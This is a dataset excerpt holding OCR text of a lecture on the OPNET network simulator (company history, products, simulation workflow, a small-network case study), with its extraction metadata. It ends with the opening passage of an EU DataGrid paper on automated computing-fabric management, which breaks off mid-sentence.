id
stringlengths
40
40
text
stringlengths
9
86.7k
metadata
stringlengths
3k
16.2k
source
stringclasses
1 value
added
stringdate
2024-11-21 00:00:00
2024-12-12 00:00:00
created
stringdate
2024-11-21 00:00:00
2024-12-12 00:00:00
8f4c23f6008be4b025f5722f629a216d1b2724d3
Network Simulators: OPNET Overview and Examples Roman Dunaytsev Department of Communications Engineering Tampere University of Technology roman.dunaytsev@tut.fi November 30, 2010 Outline 1. About OPNET 2. IT Guru Academic Edition 3. OPNET Modeler 4. Simulation workflow 5. Example 6. OPNET Modeler editors Outline 1. About OPNET 2. IT Guru Academic Edition 3. OPNET Modeler 4. Simulation workflow 5. Example 6. OPNET Modeler editors About OPNET - Alain Cohen, a 20-year-old MIT student, developed OPNET in 1986 - Alain Cohen and his classmate Steven Baraniuk developed a prototype data network modeling and simulation system they called "Optimized Network Engineering Tools", or OPNET for short About OPNET (cont’d) - Alain Cohen, along with his brother Marc and Steven Baraniuk, founded **MIL 3, Inc.** in 1986 (OPNET 1.1) - In 2000, MIL 3, Inc. changed name to **OPNET Technologies, Inc.** (OPNET 7.0) Today, OPNET Technologies, Inc. is a provider of software products and related services for: - Application performance management - Network planning and engineering - Network research and development **www.opnet.com** - Chairman & Chief Executive Officer: Marc Cohen - President & Chief Technology Officer: Alain Cohen About OPNET (cont’d) - Selected consolidated financial data: - Huge investments in R&D <table> <thead> <tr> <th></th> <th></th> <th></th> <th></th> <th></th> <th></th> </tr> </thead> <tbody> <tr> <td><strong>Revenue:</strong></td> <td></td> <td></td> <td></td> <td></td> <td></td> </tr> <tr> <td>Product</td> <td>$52,252</td> <td>$51,211</td> <td>$38,838</td> <td>$43,186</td> <td>$31,976</td> </tr> <tr> <td>Product updates, technical support and services</td> <td>47,264</td> <td>43,067</td> <td>34,787</td> <td>28,062</td> <td>24,226</td> </tr> <tr> <td>Professional services</td> <td>26,831</td> <td>28,601</td> <td>27,721</td> <td>23,882</td> <td>19,913</td> </tr> <tr> <td>Total revenue</td> <td><strong>126,347</strong></td> <td><strong>122,879</strong></td> <td><strong>101,346</strong></td> <td><strong>95,130</strong></td> <td><strong>76,115</strong></td> </tr> <tr> <td><strong>Cost of revenue:</strong></td> <td></td> <td></td> <td></td> <td></td> <td></td> </tr> <tr> <td>Product</td> <td>5,983</td> <td>3,536</td> <td>1,035</td> <td>638</td> <td>657</td> </tr> <tr> <td>Product updates, technical support and services</td> <td>4,859</td> <td>4,665</td> <td>4,514</td> <td>3,264</td> <td>2,637</td> </tr> <tr> <td>Professional services</td> <td>19,328</td> <td>20,911</td> <td>19,154</td> <td>15,904</td> <td>13,705</td> </tr> <tr> <td>Amortization of acquired technology</td> <td>1,835</td> <td>2,172</td> <td>1,486</td> <td>723</td> <td>832</td> </tr> <tr> <td>Total cost of revenue</td> <td><strong>32,005</strong></td> <td><strong>31,284</strong></td> <td><strong>26,189</strong></td> <td><strong>20,529</strong></td> <td><strong>17,831</strong></td> </tr> <tr> <td><strong>Gross profit:</strong></td> <td><strong>94,342</strong></td> <td><strong>91,595</strong></td> <td><strong>75,157</strong></td> <td><strong>74,601</strong></td> <td><strong>58,284</strong></td> </tr> <tr> <td><strong>Operating expenses:</strong></td> <td></td> <td></td> <td></td> <td></td> <td></td> </tr> <tr> <td>Research and development</td> <td>32,043</td> <td>30,791</td> <td>27,471</td> <td>21,688</td> <td>18,643</td> </tr> <tr> <td>Sales and marketing</td> <td><strong>43,181</strong></td> <td><strong>42,533</strong></td> <td><strong>39,357</strong></td> <td><strong>34,133</strong></td> <td><strong>26,300</strong></td> </tr> <tr> <td>General and administrative</td> <td>11,011</td> <td>11,857</td> <td>11,747</td> <td>10,994</td> <td>13,375</td> </tr> <tr> <td>Total operating expenses</td> <td><strong>86,235</strong></td> <td><strong>85,181</strong></td> <td><strong>78,575</strong></td> <td><strong>66,815</strong></td> <td><strong>58,318</strong></td> </tr> </tbody> </table> The company’s first product was **OPNET Modeler**, a software tool for network simulation and modeling. Since then, it has been diversified to provide a range of solutions for: - **Application performance management** - ACE Analyst Standard, ACE Analyst Plus, ACE Enterprise Management Server, OPNET Panorama, ACE Live Appliance, ACE Live Rover, ACE Live on RSP, ACE Live VMon, IT Guru Systems Planner - **Network planning and engineering** - IT Guru, SP Guru Network Planner, SP Guru Transport Planner, IT Guru Network Planner, NetOne, VNE Server, Report Server, IT NetMapper, IT Sentinel, SP Sentinel, OPNET nCompass for Enterprises, OPNET nCompass for Service Providers - **Network R&D** About OPNET (cont’d) - Sample list of clients: - **Service providers** - British Telecom, Deutsche Telekom, France Telecom, Inmarsat, . . . - **Enterprises** - Deutsche Post AG, FBI, Oracle, 20th Century Fox, Xerox, . . . - **Network equipment manufacturers** - 3Com Corporation, Cisco Systems, Ericsson, Fujitsu, HP, Nokia, . . . - **Defense and homeland security** - **University Program** - Over 25,000 university professors and students use OPNET products in Electrical Engineering, Computer Science, and related disciplines The following products are available through the University Program: 1. **IT Guru** - Modeling of a broad range of network protocols and technologies - 800+ protocol and vendor device models 2. **OPNET Modeler** - IT Guru with source code for protocol and technology models 3. **OPNET Modeler Wireless Suite** - OPNET Modeler with a broad range of wireless models 4. **SP Guru Transport Planner** - Optical network planning and engineering 5. **IT Guru Academic Edition** - Based on IT Guru commercial version 9.1 (Build 1999) - Created for introductory level networking courses - Greatly simplified licensing (6-month renewable license) Outline 1. About OPNET 2. IT Guru Academic Edition 3. OPNET Modeler 4. Simulation workflow 5. Example 6. OPNET Modeler editors IT Guru Academic Edition - **IT Guru Academic Edition limitations:** - Limited import and export capabilities - Limited wireless functionality - Other product modules are not supported - The maximum number of simulation events is limited by 50 million - The maximum number of intermediate nodes is limited by 20 - **Supported platforms:** - **Microsoft:** Windows 2000, Windows XP, Windows Vista, Windows 7 - **ITG_Academic_Edition_v1999.exe:** \( \sim 190 \text{ MB} \) IT Guru Academic Edition (cont’d) 1. Registration - www.opnet.com/university_program/itguru_academic_edition/ 2. Download and installation - www.opnet.com/itguru-academic/download.html 3. Activation - www.opnet.com/itguru-academic/instructions.html Outline 1. About OPNET 2. IT Guru Academic Edition 3. OPNET Modeler 4. Simulation workflow 5. Example 6. OPNET Modeler editors System Requirements - **Supported platforms:** - **Linux:** Red Hat Enterprise, Fedora - **OPNET software does not work with number representation different from English** - The reason is the different decimal separator: point in English, comma practically in all others - Start ⇒ Control Panel ⇒ Regional and Language Options ⇒ Standards and formats ⇒ English (United States) Installing OPNET Modeler - **Supporting software for OPNET Modeler:** - **Linux:** gcc 3.4 or higher - **Install OPNET components in the following order:** 1. Software 2. Additional modules (if any) 3. Model library 4. Documentation OPNET network R&D solutions enable: - Test technology designs in realistic scenarios - Evaluate enhancements to standards-based protocols - Develop new protocols and technologies Key Features - **Hierarchical GUI-based editors** - **High-fidelity modeling** - 800+ wired/wireless protocol and vendor device models with source code - Different aspects of wireless communication, including RF propagation, antenna modeling, signal modulation, node mobility, and interference - **Scalable simulation** - 32-bit and 64-bit fully parallel simulation kernel - Grid computing support for distributed simulation - **Sophisticated analysis** - Integrated GUI-based debugging and analysis - **Integrating live network and application behavior** - Optional **System-in-the-Loop** module to interface simulations with live systems - Open interface for integrating external files, libraries, and other simulators OPNET supports 4 simulation technologies: - Discrete Event Simulation (DES) - Flow Analysis - ACE QuickPredict - Hybrid Simulation (within the DES environment) Simulation Technologies (cont’d) - **Discrete Event Simulation** provides highly detailed models that explicitly simulate packets and protocol messages. - The models in DES execute the protocol in much the same way as a production environment. - Although DES provides very high-fidelity results, simulation runtimes are longer than with the other methods. Hybrid simulation combines 2 distinct modeling techniques (analytical and discrete) to provide accurate, detailed results for targeted flows. Hybrid simulation relies on background and explicit traffic: - **Background traffic** is used to represent most of a network’s ambient load at an abstract level. - Selected network application flows are represented in detail, using the **explicit traffic** models. Execution runtimes can be significantly faster as compared with DES. Flow Analysis uses analytical techniques and algorithms to model steady-state network behavior. Flow Analysis does not model individual protocol messages or packets, therefore it does not generate results for transient network conditions. It can be used to study routing and reachability across the network in steady state, and in scenarios with one or more failed devices. Execution runtimes can be significantly faster as compared with DES. ACE QuickPredict uses an analytical technique for studying the impact on application response time of changing network parameters (e.g., bandwidth, latency, utilization, packet loss). This technique is supported within the OPNET Application Characterization Environment (ACE). Outline 1. About OPNET 2. IT Guru Academic Edition 3. OPNET Modeler 4. Simulation workflow 5. Example 6. OPNET Modeler editors OPNET Modeler uses a project-and-scenario approach to model networks. - **Project** – a collection of network-related scenarios, each of which explores a particular aspect of the network design. All projects contain at least 1 scenario. - **Scenario** – a single instance of a network. Typically, a scenario presents a unique configuration for the network. The term "configuration" can refer to different aspects such as topology, protocols, applications, traffic, and simulation settings. Projects and Scenarios (cont’d) - **OPNET simulation workflow**: 1. Create a project 2. Create a baseline scenario - Import or create a network topology - Import or create traffic - Choose statistics to be collected - Run the simulation - View the results 3. Duplicate the scenario - Make changes - Re-run the simulation - Compare the obtained results 4. Repeat Step 3 if needed Projects and Scenarios (cont’d) - New project - **Project Editor** is used to construct and edit the topology of a network model Projects and Scenarios (cont’d) - Project Editor window ![Project Editor window with labeled sections: Menu Bar, Tool Bar, Workspace.] Copyright (C) 2010 MapInfo Corporation. Troy, New York. Image rendered using MapInfo Professional; City Information (C) Copyright (C) 2010 Stefan Helders www.world-geostizer.com. workspace Network Topologies - Initial topology Network Topologies (cont’d) - There are several methods for creating a network topology: - Manually, by dragging and dropping objects from an **Object Palette** to the Project Editor workspace - Manually, using the Topology ⇒ **Rapid Configuration**... command from the Menu Bar to specify and build a complete network topology quickly - Automatically, by **importing** the network model from an external data source – either a system that monitors your network or one or more data files that describe the network - Importing a topology ensures that the network model you build corresponds to the existing network exactly Network Topologies (cont’d) - Network scale Network Topologies (cont’d) - Background maps Network Topologies (cont’d) - Zooming Network Topologies (cont’d) - Dragging and dropping objects from an **Object Palette** into the Project Editor workspace Using the Topology ⇒ **Rapid Configuration...** command from the Menu Bar to quickly deploy common network topologies. Network Topologies (cont’d) - Available configurations: Bus, Mesh (Full or Randomized), Ring, Star, Tree, and Unconnected Net Network Topologies (cont’d) - Using the Topology ⇒ **Deploy Wireless Network...** command from the Menu Bar to specify and build a wireless network Model Library - OPNET Modeler provides an extensive library of models that you can use to build networks - These models are called **standard models** because users can also develop their own models - Those models can then be shared with other OPNET users if desired - Certain models support the needs of users with particular interests in emerging or vendor-specific technologies (aka **specialized models**) - An additional license is needed to use these models in a simulation The standard model library consists of the following types of objects: - Subnetworks - Nodes (aka devices) - Links - LANs and clouds - Utility objects Objects - **Model Family**: internet_toolbox Subnetworks are essentially containers that abstract the network components specified within them into one object. A subnetwork can also contain other subnetworks. A special subnetwork called the top level or global subnetwork is the highest level subnetwork in the network hierarchy. - **Nodes** - A node represents a network device with a wide range of possible capabilities (router, switch, hub, workstation, server, firewall, etc.) - The actual function and behavior of a node is determined by its **node model** Objects (cont’d) - **Links** - Links represent the physical media and properties (line rate in bits per second, delay, likelihood of data corruption, etc.) - Links are represented as line segments or a series of line segments with arrowheads Objects (cont’d) - **LANs** - A LAN object abstracts the LAN infrastructure into one object - LAN objects dramatically reduce the amount of configuration required to do to represent an internetwork of LANs, and the amount of memory needed to run the simulation ![Image of Object Palette Tree project1-scenario1](image-url) Clouds - A cloud object abstracts the WAN infrastructure into one object - Cloud objects provide high-level characteristics (packet latency and discard ratio) used to simulate the behavior of ATM, Frame Relay, and IP WANs Utility objects - Utility objects do not correspond to the actual physical infrastructure - Instead, they perform logical functions in the network (configuration of network resources, scheduling special events, etc.) Applications and Traffic - The first step is to drag and drop Application Config and Profile Config objects from the Object Palette to the Project Editor workspace. **Application Config** specifies *standard* and *custom* applications used in the simulation, including traffic and QoS parameters. - Standard applications (Light/Heavy): Database, Email, FTP, HTTP, Print, Remote Login, Video Conferencing, Voice **Profile Config** specifies the activity patterns of a user or groups of users in terms of the applications used over a period of time. - You can have several different profiles running on a given workstation or a LAN. - These profiles can represent different user groups and behavior patterns. Profiles describes activity patterns, such as: - When does a user start using applications? - What is the duration of his/her activity? - What applications does he/she use? - How often does he/she use each application? Configure applications ⇒ Define profiles ⇒ (Menu Bar ⇒ Protocols ⇒ Applications ⇒ **Deploy Defined Applications**) Choosing Statistics - Choose statistics to collect - Menu Bar ⇒ DES ⇒ Choose Individual Statistics... - Or Right-click in the Project Editor ⇒ Choose Individual DES Statistics - List of statistics appears - Types of statistics - **Global**: collected on the total network (e.g., application response time) - **Node**: collected on individual nodes (e.g., delay, delay variation) - **Link**: collected on individual links (e.g., utilization, throughput, queuing delay) Choosing Statistics (cont’d) - Choose Results dialog box Running Simulation - Menu Bar ⇒ DES ⇒ Configure/Run Discrete Event Simulation... - Set simulation options and click Run Viewing Results - Menu Bar ⇒ DES ⇒ Results ⇒ **View Results**... - Or Right-click in the Project Editor ⇒ **View Results** Outline 1. About OPNET 2. IT Guru Academic Edition 3. OPNET Modeler 4. Simulation workflow 5. Example 6. OPNET Modeler editors Case study: Small Internetworks In this example, you plan for the expansion of a small company’s intranet. Currently, the company has a star topology network on the first floor of its office building and plans to add an additional star topology network on another floor. You will build and test this ”what-if” scenario to ensure that the load added by the second network will not cause the network to fail. Creating the network Initial Topology: Create empty scenario Choose Network Scale: Office & Use metric units Specify Size: 100 m x 100 m Select Technologies: Sm_Int_Model_List Small Internetworks (cont’d) - **Rapid Configuration**: Star - **Center Node Model**: 3C_SSII_1100_3300_4s_ae52_e48_ge3 - **Periphery Node Model**: Sm_Int_wkstn - **Number (of periphery nodes)**: 30 - **Link Model**: 10BaseT - **Center X x Y**: 25 x 25 - **Radius**: 20 - **Sm_Int_server, 10BaseT, Sm_Application_Config, Sm_Profile_Config** Right-click on a node ⇒ View Node Description 3C_SSII_1100_3300_4s_ae52_e48_ge3 represents a stack of 4 3Com switches (4s): - 2 SuperStack II 1100 switches - 2 SuperStack II 3300 switches - 52 auto-sensing Ethernet ports (ae52) - 48 Ethernet ports (e48) - 3 Gigabit Ethernet ports (ge3) Small Internetworks (cont’d) - Compare with an abstract node in ns-2 - set node_30 [$ns node] Small Internetworks (cont’d) - The original network ![Diagram of network with nodes and connections] Will the server be able to handle the additional load of the second network? - Right-click on the **server** node ⇒ Individual DES Statistics ⇒ Node Statistics ⇒ Ethernet ⇒ **Load (bits/sec)** Will the total delay across the network be acceptable once the second network is installed? - Right-click in the **workspace** (but not on an object) ⇒ Individual DES Statistics ⇒ Global Statistics ⇒ Ethernet ⇒ **Delay (sec)** Run the simulation for **30 minutes** Expanding the network Rapid Configuration: Star Center Node Model: 3C_SI11_1100_3300_4s_ae52_e48_ge3 Periphery Node Model: Sm_Int_wkstn Number (of periphery nodes): 15 Link Model: 10BaseT Center X x Y: 75 x 62.5 Radius: 20 CS_2514_1s_e2_sl2 (Cisco 2514 router), 10BaseT Small Internetworks (cont’d) - The extended network Comparing results Menu Bar ⇒ DES ⇒ Results ⇒ **Compare Results...** Small Internetworks (cont’d) - The average load for the expansion scenario is higher (as expected) - But there is no significant change in Ethernet delay on the network Outline 1. About OPNET 2. IT Guru Academic Edition 3. OPNET Modeler 4. Simulation workflow 5. Example 6. OPNET Modeler editors The **Project Editor** is used to construct and edit the topology of a network model. The **Node Editor** provides operations to support creation and editing of node models. The **Process Editor** is used to specify the behavior of process models. Process models use a **finite state machine (FSM)** paradigm to express behavior that depends on the current state and a new stimuli. The operations performed by a process model are described in statements based on the **C or C++ languages**. These statements can be associated with states, transitions, or special blocks within the process model.
{"Source-Url": "http://www.cs.tut.fi/kurssit/TLT-2707/lecture12.pdf", "len_cl100k_base": 5055, "olmocr-version": "0.1.53", "pdf-total-pages": 69, "total-fallback-pages": 0, "total-input-tokens": 89786, "total-output-tokens": 7516, "length": "2e12", "weborganizer": {"__label__adult": 0.0004570484161376953, "__label__art_design": 0.00046753883361816406, "__label__crime_law": 0.0004684925079345703, "__label__education_jobs": 0.0087432861328125, "__label__entertainment": 0.00034880638122558594, "__label__fashion_beauty": 0.0002472400665283203, "__label__finance_business": 0.003986358642578125, "__label__food_dining": 0.0003216266632080078, "__label__games": 0.0016374588012695312, "__label__hardware": 0.006378173828125, "__label__health": 0.000453948974609375, "__label__history": 0.0006203651428222656, "__label__home_hobbies": 0.0001399517059326172, "__label__industrial": 0.00151824951171875, "__label__literature": 0.0004010200500488281, "__label__politics": 0.0003063678741455078, "__label__religion": 0.0004808902740478515, "__label__science_tech": 0.1868896484375, "__label__social_life": 0.00022208690643310547, "__label__software": 0.354736328125, "__label__software_dev": 0.4296875, "__label__sports_fitness": 0.0004105567932128906, "__label__transportation": 0.0008425712585449219, "__label__travel": 0.00028014183044433594}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 19760, 0.03399]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 19760, 0.35086]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 19760, 0.76412]], "google_gemma-3-12b-it_contains_pii": [[0, 182, false], [182, 310, null], [310, 438, null], [438, 701, null], [701, 1234, null], [1234, 2913, null], [2913, 3702, null], [3702, 4323, null], [4323, 4990, null], [4990, 5118, null], [5118, 5604, null], [5604, 5865, null], [5865, 5993, null], [5993, 6469, null], [6469, 6876, null], [6876, 7056, null], [7056, 7792, null], [7792, 7952, null], [7952, 8311, null], [8311, 8789, null], [8789, 9235, null], [9235, 9513, null], [9513, 9641, null], [9641, 10133, null], [10133, 10561, null], [10561, 10608, null], [10608, 10691, null], [10691, 11019, null], [11019, 11058, null], [11058, 11689, null], [11689, 11734, null], [11734, 11781, null], [11781, 11820, null], [11820, 11942, null], [11942, 12061, null], [12061, 12188, null], [12188, 12337, null], [12337, 12879, null], [12879, 13031, null], [13031, 13077, null], [13077, 13362, null], [13362, 13599, null], [13599, 13846, null], [13846, 14175, null], [14175, 14398, null], [14398, 14616, null], [14616, 15336, null], [15336, 15672, null], [15672, 16154, null], [16154, 16212, null], [16212, 16333, null], [16333, 16457, null], [16457, 16585, null], [16585, 16995, null], [16995, 17175, null], [17175, 17517, null], [17517, 17806, null], [17806, 17903, null], [17903, 18006, null], [18006, 18466, null], [18466, 18744, null], [18744, 18797, null], [18797, 18866, null], [18866, 19036, null], [19036, 19164, null], [19164, 19250, null], [19250, 19338, null], [19338, 19546, null], [19546, 19760, null]], "google_gemma-3-12b-it_is_public_document": [[0, 182, true], [182, 310, null], [310, 438, null], [438, 701, null], [701, 1234, null], [1234, 2913, null], [2913, 3702, null], [3702, 4323, null], [4323, 4990, null], [4990, 5118, null], [5118, 5604, null], [5604, 5865, null], [5865, 5993, null], [5993, 6469, null], [6469, 6876, null], [6876, 7056, null], [7056, 7792, null], [7792, 7952, null], [7952, 8311, null], [8311, 8789, null], [8789, 9235, null], [9235, 9513, null], [9513, 9641, null], [9641, 10133, null], [10133, 10561, null], [10561, 10608, null], [10608, 10691, null], [10691, 11019, null], [11019, 11058, null], [11058, 11689, null], [11689, 11734, null], [11734, 11781, null], [11781, 11820, null], [11820, 11942, null], [11942, 12061, null], [12061, 12188, null], [12188, 12337, null], [12337, 12879, null], [12879, 13031, null], [13031, 13077, null], [13077, 13362, null], [13362, 13599, null], [13599, 13846, null], [13846, 14175, null], [14175, 14398, null], [14398, 14616, null], [14616, 15336, null], [15336, 15672, null], [15672, 16154, null], [16154, 16212, null], [16212, 16333, null], [16333, 16457, null], [16457, 16585, null], [16585, 16995, null], [16995, 17175, null], [17175, 17517, null], [17517, 17806, null], [17806, 17903, null], [17903, 18006, null], [18006, 18466, null], [18466, 18744, null], [18744, 18797, null], [18797, 18866, null], [18866, 19036, null], [19036, 19164, null], [19164, 19250, null], [19250, 19338, null], [19338, 19546, null], [19546, 19760, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 19760, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 19760, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 19760, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 19760, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 19760, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 19760, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 19760, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 19760, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 19760, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 19760, null]], "pdf_page_numbers": [[0, 182, 1], [182, 310, 2], [310, 438, 3], [438, 701, 4], [701, 1234, 5], [1234, 2913, 6], [2913, 3702, 7], [3702, 4323, 8], [4323, 4990, 9], [4990, 5118, 10], [5118, 5604, 11], [5604, 5865, 12], [5865, 5993, 13], [5993, 6469, 14], [6469, 6876, 15], [6876, 7056, 16], [7056, 7792, 17], [7792, 7952, 18], [7952, 8311, 19], [8311, 8789, 20], [8789, 9235, 21], [9235, 9513, 22], [9513, 9641, 23], [9641, 10133, 24], [10133, 10561, 25], [10561, 10608, 26], [10608, 10691, 27], [10691, 11019, 28], [11019, 11058, 29], [11058, 11689, 30], [11689, 11734, 31], [11734, 11781, 32], [11781, 11820, 33], [11820, 11942, 34], [11942, 12061, 35], [12061, 12188, 36], [12188, 12337, 37], [12337, 12879, 38], [12879, 13031, 39], [13031, 13077, 40], [13077, 13362, 41], [13362, 13599, 42], [13599, 13846, 43], [13846, 14175, 44], [14175, 14398, 45], [14398, 14616, 46], [14616, 15336, 47], [15336, 15672, 48], [15672, 16154, 49], [16154, 16212, 50], [16212, 16333, 51], [16333, 16457, 52], [16457, 16585, 53], [16585, 16995, 54], [16995, 17175, 55], [17175, 17517, 56], [17517, 17806, 57], [17806, 17903, 58], [17903, 18006, 59], [18006, 18466, 60], [18466, 18744, 61], [18744, 18797, 62], [18797, 18866, 63], [18866, 19036, 64], [19036, 19164, 65], [19164, 19250, 66], [19250, 19338, 67], [19338, 19546, 68], [19546, 19760, 69]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 19760, 0.05263]]}
olmocr_science_pdfs
2024-12-09
2024-12-09
d8fdfd12ac106499f159268b135b754ad2128b77
Towards automation of computing fabrics using tools from the fabric management workpackage of the EU DataGrid project Olof Bärring, Maite Barroso Lopez, German Cancio, Sylvain Chapeland, Lionel Cons, Piotr Poznański, Philippe Defert, Jan Iven, Thorsten Kleinwort, Bernd Panzer-Steindel, Jaroslaw Polok, Catherine Rafflin, Alan Silverman, Tim Smith, Jan Van Eldik CERN, CH1211 Geneva-23, Switzerland Massimo Biasotto, Cristine Aiftimiei, Enrico Ferro, Gaetano Maron INFN-LNL, Viale dell'Università 2, I-35020 Legnaro (PADOVA), Italy Andrea Chierici, Luca Dellagnello INFN-CNAF, Viale Berti Pichat 6/2, I-40127 Bologna, Italy Marco Serra INFN-Roma1, P.le Aldo Moro 2, I-00185 Roma, Italy Michele Michelotto INFN-PADOVA, Via Marzolo 8, I-35131 Padova, Italy Thomas Röbitz, Florian Schintke ZIB, Takustraße 7, D-14195 Berlin – Dahlem, Germany Lord Hess, Volker Lindenstruth, Frank Pister, Timm Morten Steinbeck Im Neuenheimer Feld 227, D-69120 Heidelberg, Germany David Groep, Martijn Steenbakkers NIKHEF, PO Box 41882, 1009 DB Amsterdam, The Netherlands Paul Anderson, Tim Colles, Alexander Holt, Alastair Scobie University of Edinburgh, Old College, South Bridge, Edinburgh EH8 9YL, UK Michael George Oxford Street, Liverpool L69 7ZE, United Kingdom Rafael A. Garcia Leiva Departament of Theoretical Physics, Universidad Autónoma de Madrid Ctra Colmenar Km 15 28049 Madrid, Spain The EU DataGrid project workpackage 4 has as an objective to provide the necessary tools for automating the management of medium size to very large computing fabrics. At the end of the second project year subsystems for centralized configuration management (presented at LISA’02) and performance/exception monitoring have been delivered. This will soon be augmented with a subsystem for node installation and service configuration, which is based on existing widely used standards where available (e.g. rpm, kickstart, init.d scripts) and clean interfaces to OS dependent components (e.g. base installation and service management). The three subsystems together allow for centralized management of very large computer farms. Finally, a fault tolerance system is being developed for tying together the above subsystems to form a complete framework for automated enterprise computing management by 3Q03. All software developed is open source covered by the EU DataGrid project license agreements. This article describes the architecture behind the designed fabric management system and the status of the different developments. It also covers the experience with an existing tool for automated configuration and installation that have been adapted and used from the beginning to manage the EU DataGrid testbed, which is now used for LHC data challenges. 1. INTRODUCTION The EU DataGrid project is a three-year EU funded project to develop middleware for data intensive grid applications. The project started in January 2001 and is divided into 12 workpackages: 5 for middleware development, 2 for Grid testbed infrastructure, 3 for scientific applications (HEP, Biology, Earth Science) and 2 for dissemination and management. Workpackage 4, WP4, is one of the middleware workpackages and has as main objectives to deliver a computing fabric comprised of all the necessary tools to manage a center providing grid services on clusters of thousands of nodes. The workpackage is divided into five software development subtasks: - Configuration management - System monitoring - Installation management and maintenance - Fault tolerance - Resource management - “Gridification” The four first subtasks provide the basic software subsystems for the automated fabric management while the two latter are more aimed to grid-enable the fabric. This paper will mainly describe the automated fabric management subsystems. The next section describes the high-level architecture for how the different subsystems work together. Thereafter follows four sections with detailed descriptions for each subsystem and the development status. Finally the conclusions will sum up the experience and status so far and future work up to the end of the project. 2. ARCHITECTURE A high level view of the WP4 architecture for automated fabric management is depicted in Figure 1. Figure 1: high level view of the WP4 architecture for automated fabric management. The numbered arrows 1 – 10 indicated in Figure 1 describe a typical sequence for the detection of an exception and coordination of the automated recovery: 1. Monitoring data flows from all nodes in the computer center to a monitoring repository 2. The fault tolerance system reads and correlates data from the monitoring system to detect exception conditions that require automated interventions 3. The fault tolerance system instructs the resource management system that interfaces with the cluster batch system to remove the node from production and drain/kill (depending on the urgency) running jobs on the node 4. Fault tolerance system informs the monitoring system about the action taken to remove the node from production 5. The resource management system informs the monitoring when the node has been removed from production and all running jobs have finished 6. The fault tolerance system reads and the updated node information and decides to launch the node maintenance 7. Depending on the maintenance action the fault tolerance system may first change the configuration of the node by committing a new configuration template in the configuration management system. If no reconfiguration is required the fault tolerance system may either directly launch the repair on the node or instruct the installation and node mgmt system to perform some action (e.g. repair an installation or simply reboot the node). 8. Fault tolerance system informs the monitoring system about the launched repair action 9. Installation and node management system reads the node configuration profile managed by the configuration management system and calls service configuration objects to deploy new configurations or simply restart services. 10. Monitoring data flows from all nodes in the computer center to a monitoring repository 11. Fault tolerance system reads data from the monitoring repository and detects that the node has been repaired. 12. Fault tolerance system instructs the resource management system to put back the node in production 13. Fault tolerance system informs the monitoring system about the action to put the node back in production It is important to point out the information model chosen by WP4: the configuration management system manages the desired state while the monitoring system records the actual state. This distinction is necessary since deployment of configuration changes may take long time and in real production clusters the actual state and desired state may only converge asymptotically. For instance, a configuration change that requires a reboot cannot be deployed on all nodes at the same time if a minimum service level is required. The monitoring system not only receives normal monitoring data such as performance and exception metrics but it is also used to keep track of all automatic recovery actions. It works in conjunction with the fault tolerance system, which takes its input data from the monitoring system and reports back the launched recovery actions. This strict tracing of actions also holds true for manual interventions where, for instance, the acknowledgement of an alarm is recorded by the monitoring system. The aim is to allow for several levels of fault tolerance recovery so that if a repair fails after a certain number of retries, another repair strategy could be selected automatically. The configuration information for the desired state is expressed in a special declarative language, called the High Level Definition Language, HLDL, developed by WP4. The administrators or service managers write HLDL configuration templates, which are compiled by the configuration management system into node profiles. A node profile is an XML files containing the entire configuration that is to be managed on a node. The HLDL language supports inheritance through inclusion, which allows for managing the configuration information in a hierarchical structure called the template hierarchy. Another hierarchy, the configuration schema, is formed by the name space defined for the configuration parameters. The configuration schema and the template hierarchy are independent. The installation and node management subsystem includes several components: - The Automated Installation Infrastructure (AII) for automatic generation of DHCP configuration and kickstart files according to the desired configuration managed by the configuration management system. - The Node Configuration Manager (NCM) deploys the desired node configuration using a component framework. - The Software Package Management Agent (SPMA) handles local software installation. - The software repository (SWRep) contains the software packages that might be referenced from a desired configuration. In the following sections the monitoring, fault tolerance, configuration and installation subsystems will be described in more detail. ### 3. SYSTEM MONITORING SUBSYSTEM #### 3.1. Design The different components of the monitoring subsystem [13] are shown in Figure 2. A Monitoring Sensor Agent (MSA) runs on all monitored nodes. It is responsible for calling the plug-in sensors to sample the configured metrics. The sampling frequency can be configured per metric. The interface is designed so that the sensor is not required to answer to sampling requests and it may chose to trigger its own unsolicited samplings. The sensor communicates with the MSA over a normal UNIX using a simple text protocol. To hide the protocol details, a sensor API C++ class has been defined for convenience. All monitoring data gathered on a node is stored in a local cache, which is available for local consumers of monitoring data. This is useful for allowing for local fault tolerance correlations engines. The monitoring data is also forwarded to a global measurement repository, where it is available for remote global consumers. The same externalized measurement repository API is used to access the data at both local and global level. The repository API is implemented using SOAP RPC and provides methods for time series queries and subscription/notification of new monitoring measurements. The sampling values are plain text strings and it is up to the consumer to correctly parse the values. While this can be perceived as a cumbersome for simple single number valued metrics, it has the advantage that the metric values are unconstrained as long as they can be represented as printable text strings. Figure 2: components of the monitoring system and how they are deployed The local cache is implemented as a flat text file database, with one file per metric per day. The file format is "timestamp value". The global measurement repository server provides an open interface (same as the repository API) to plug-in any backend database system. Current database backend implementations for flat text file (same as for the local cache) and Oracle exist. An interface MySQL is being developed. Figure 3: schematic picture of TCP transport proxy mechanism. The transport of monitoring data from the monitored nodes to the central repository is also pluggable. An UDP based implementation has been in use since more than one year at CERN. A TCP based implementation exists as prototype. The TCP based solution works over permanently open sockets and it includes a proxy like mechanism to fan-out the number of open connections on the global repository to a subset of the monitored nodes. 3.2. Status Monitored nodes: - Monitoring Sensor Agent (MSA) and UDP based transport protocol are 